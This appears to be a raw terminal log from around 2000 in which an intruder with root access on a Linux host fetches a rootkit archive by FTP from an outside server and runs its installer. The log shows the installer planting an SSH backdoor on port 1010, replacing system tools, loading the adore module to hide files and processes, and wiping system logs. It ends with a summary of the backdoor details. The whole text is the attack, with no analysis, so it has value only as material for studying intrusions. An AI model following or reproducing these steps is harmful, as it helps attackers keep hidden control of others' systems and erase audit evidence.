cd /;ls -alF;w;uname -a;id total 74 drwxr-xr-x 17 root root 1024 Mar 22 22:21 ./ drwxr-xr-x 17 root root 1024 Mar 22 22:21 ../ drwxr-xr-x 2 root root 2048 Mar 22 23:16 bin/ drwxr-xr-x 3 root root 1024 Mar 22 23:04 boot/ drwxr-xr-x 6 root root 34816 Mar 22 23:14 dev/ drwxr-xr-x 30 root root 3072 Mar 22 23:29 etc/ drwxr-xr-x 6 root root 4096 Mar 22 23:03 home/ drwxr-xr-x 4 root root 3072 Mar 22 22:56 lib/ drwxr-xr-x 2 root root 12288 Mar 22 22:19 lost+found/ drwxr-xr-x 4 root root 1024 Mar 22 22:21 mnt/ drwxr-xr-x 2 root root 1024 Aug 23 1999 opt/ dr-xr-xr-x 49 root root 0 Mar 22 23:04 proc/ drwxr-x--- 6 root root 1024 Mar 24 08:03 root/ drwxr-xr-x 3 root root 3072 Mar 22 23:13 sbin/ drwxrwxrwt 3 root root 1024 Mar 31 04:22 tmp/ drwxr-xr-x 21 root root 4096 Mar 22 22:46 usr/ drwxr-xr-x 20 root root 1024 Mar 22 23:03 var/ 12:33pm up 8 days, 13:29, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT Linux localhost 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown uid=0(root) gid=0(root) id uid=0(root) gid=0(root) ftp ftp.geocities.com Password: hash get rk1010.tgz Name (ftp.geocities.com:root): Hash mark printing on (1024 bytes/hash mark). ############################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################## bye tar -xvzf rk1010.tgz rk4/ rk4/bash rk4/chipsul rk4/clean rk4/doliroot rk4/doliroot2 rk4/doliroot3 rk4/go rk4/hideall.tar.gz rk4/httpd.cgi rk4/ifconfig rk4/in.rexedcs rk4/juno rk4/kkill rk4/locate rk4/logclear rk4/ls rk4/netstat rk4/ps rk4/rotlog rk4/scaners.tar.gz rk4/see rk4/sense rk4/sl rk4/sl4 rk4/ssh.tar.gz rk4/syslogd rk4/tcp.log rk4/tcpd rk4/top rk4/uptime rk4/w rk4/wget rk4/who rk4/smurf.tgz cd rk4 ./go  ######################################### # SSH RootKit IV # #---------------------------------------# # By DoLittle # #   # ######################################### --> Stoping portmap and ftp..... --> DONE! in.rexedcs: no process killed defauths: no process killed dcs: no process killed defauths: no process killed --> CHMod some files..... chmod: /usr/sbin/userhelper: No such file or directory --> DONE! --> Hidding programs so that R00t can't see them.... --> DONE! --> Hidding ports so that netstat can't see them..... --> DONE! --> Installing SSH 1.5-32 BackDoor..... rcp.statd: no process killed chattr: No such file or directory while stating /usr/bin/RiP chattr: No such file or directory while stating /usr/bin/html chattr: No such file or directory while stating /sbin/xfs chattr: No such file or directory while stating /usr/bin/nscd nscd: no process killed RiP: no process killed html: no process killed usr/ usr/bin/ usr/bin/make-ssh-host-key usr/bin/ssh usr/bin/ssh-add usr/bin/ssh-agent usr/bin/ssh-askpass usr/bin/ssh-keygen usr/bin/inet usr/bin/rc.d usr/man/ usr/man/man6/ usr/man/man6/ssh_config usr/man/man6/sshd_config Generating p: ..........++ (distance 138) Generating q: ........++ (distance 106) Computing the keys... Testing the keys... Key generation complete. Initializing random number generator... Your identification has been saved in /usr/man/man6/ssh_host_key. Your public key is: 1024 37 130771060340877963314565734611653227155552147936232480797126924233482253133633358932631623913527399105347317420627208322780436383879001858674058045708311267810192020693090760961245002381787117140930978575990196091654782854834444871617809498858023142623077257556478685984617461654340038103514803868667955601351 root@localhost Your public key has been saved in /usr/man/man6/ssh_host_key.pub --> DONE! --> Creating /dev/~tty the base directory and installing some files..... --> Sniffing and installing inet on port 1010..... -->Installing hidding device..... adore/ adore/CVS/ adore/CVS/Root adore/CVS/Repository adore/CVS/Entries adore/Changelog adore/LICENSE adore/Makefile.gen adore/README adore/TODO adore/adore.c adore/ava.c adore/cleaner.c adore/configure adore/dummy.c adore/exec-test.c adore/exec.c adore/libinvisible.c adore/libinvisible.h adore/startadore adore/Makefile Starting adore configuration ... Checking 4 ELITE_UID ... found 30 Checking 4 ELITE_CMD ... using 86694 Checking 4 SMP ... NO Checking 4 MODVERSIONS ... YES Checking for kgcc ... found cc Checking 4 insmod ... found /sbin/insmod -- OK Loaded modules: nls_cp437 3748 1 (autoclean) msdos 5468 1 (autoclean) fat 30336 1 (autoclean) [msdos] lockd 30344 1 (autoclean) sunrpc 52132 1 (autoclean) [lockd] 3c59x 18980 1 (autoclean) Since version 0.33 Adore requires 'authentication' for its services. You will be prompted for a password now and this password will be compiled into 'adore' and 'ava' so no further actions by you are required. This procedure will save adore from scanners. Try to choose a unique name that won't clash with normal calls to mkdir(2). Password (echoed): Preparing /dev/~tty/adore (== cwd) for hiding ... Creating Makefile ... Exec-redirection disabled ... rm -f adore.o cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS adore.c -o adore.o cc -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS ava.c libinvisible.c -o ava cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS cleaner.c Checking for adore 0.12 or higher ... Adore 0.34 installed. Good luck. File '/dev/~tty' hided. Checking for adore 0.12 or higher ... Adore 0.34 installed. Good luck. File '/usr/bin/inet' hided. Checking for adore 0.12 or higher ... Adore 0.34 installed. Good luck. File '/usr/bin/rc.d' hided. Checking for adore 0.12 or higher ... Adore 0.34 installed. Good luck. Made PID 21397 invisible. Checking for adore 0.12 or higher ... Adore 0.34 installed. Good luck. Made PID 21394 invisible. --> Cleaning the shit......... * sauber by socked [07.27.97] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (0 lines)...0 lines removed! * Cleaning boot.log.2 (18 lines)...0 lines removed! * Cleaning cron (61 lines)...0 lines removed! * Cleaning cron.1 (1184 lines)...0 lines removed! * Cleaning cron.2 (206 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (0 lines)...0 lines removed! * Cleaning maillog.2 (23 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (0 lines)...0 lines removed! * Cleaning messages.2 (670 lines)...0 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (0 lines)...0 lines removed! * Cleaning secure.2 (22 lines)...0 lines removed! * Cleaning sendmail.st (4 lines)...3 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning spooler.2 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! * Cleaning xferlog.2 (0 lines)...0 lines removed! syslogd: no process killed * DoLittle is my Master !'Q%&@  * sauber by socked [07.27.97] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (0 lines)...0 lines removed! * Cleaning boot.log.2 (18 lines)...1 lines removed! * Cleaning cron (61 lines)...0 lines removed! * Cleaning cron.1 (1184 lines)...0 lines removed! * Cleaning cron.2 (206 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (0 lines)...0 lines removed! * Cleaning maillog.2 (23 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (0 lines)...0 lines removed! * Cleaning messages.2 (670 lines)...115 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (0 lines)...0 lines removed! * Cleaning secure.2 (22 lines)...0 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning spooler.2 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! * Cleaning xferlog.2 (0 lines)...0 lines removed! syslogd: no process killed * DoLittle is my Master !'Q%&@  * sauber by socked [07.27.97] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (0 lines)...0 lines removed! * Cleaning boot.log.2 (17 lines)...0 lines removed! * Cleaning cron (61 lines)...0 lines removed! * Cleaning cron.1 (1184 lines)...0 lines removed! * Cleaning cron.2 (206 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (0 lines)...0 lines removed! * Cleaning maillog.2 (23 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (0 lines)...0 lines removed! * Cleaning messages.2 (555 lines)...17 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (0 lines)...0 lines removed! * Cleaning secure.2 (22 lines)...7 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning spooler.2 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! * Cleaning xferlog.2 (0 lines)...0 lines removed! syslogd: no process killed * DoLittle is my Master !'Q%&@  * sauber by socked [07.27.97] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (0 lines)...0 lines removed! * Cleaning boot.log.2 (17 lines)...0 lines removed! * Cleaning cron (61 lines)...61 lines removed! * Cleaning cron.1 (1184 lines)...1184 lines removed! * Cleaning cron.2 (206 lines)...205 lines removed! * Cleaning dmesg (70 lines)...2 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (0 lines)...0 lines removed! * Cleaning maillog.2 (23 lines)...21 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (0 lines)...0 lines removed! * Cleaning messages.2 (538 lines)...9 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (0 lines)...0 lines removed! * Cleaning secure.2 (15 lines)...0 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning spooler.2 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! * Cleaning xferlog.2 (0 lines)...0 lines removed! syslogd: no process killed * DoLittle is my Master !'Q%&@  * sauber by socked [07.27.97] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (0 lines)...0 lines removed! * Cleaning boot.log.2 (17 lines)...0 lines removed! * Cleaning cron (0 lines)...0 lines removed! * Cleaning cron.1 (0 lines)...0 lines removed! * Cleaning cron.2 (1 lines)...0 lines removed! * Cleaning dmesg (68 lines)...2 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (0 lines)...0 lines removed! * Cleaning maillog.2 (2 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (0 lines)...0 lines removed! * Cleaning messages.2 (529 lines)...3 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (0 lines)...0 lines removed! * Cleaning secure.2 (15 lines)...0 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning spooler.2 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! * Cleaning xferlog.2 (0 lines)...0 lines removed! syslogd: no process killed * DoLittle is my Master !'Q%&@  chattr: No such file or directory while stating /usr/bin/hdparm mv: httpd.cgi: No such file or directory sshdu: no process killed sshd: no process killed --> R00t over..........server had been taken!!  ####################################### # --===============-- # # RootKit installed. # # --===============-- # ####################################### # Technical Info # ######## ######## # ssh ports: 1010 # # --------------------------------- # # r00t dir: /dev/~tty  # # --------------------------------- # # Hidding device # # --------------------------------- # # cd /dev/~tty/adore # # ./ava h(hide) /path/file # # ./ava i(invisible) PID # ######## ######## ####################################### ##-----------------------------------## # DoLittle <DoLittle@SunOS.Com> # # WHT <WHT@SunOS.Com # #######################################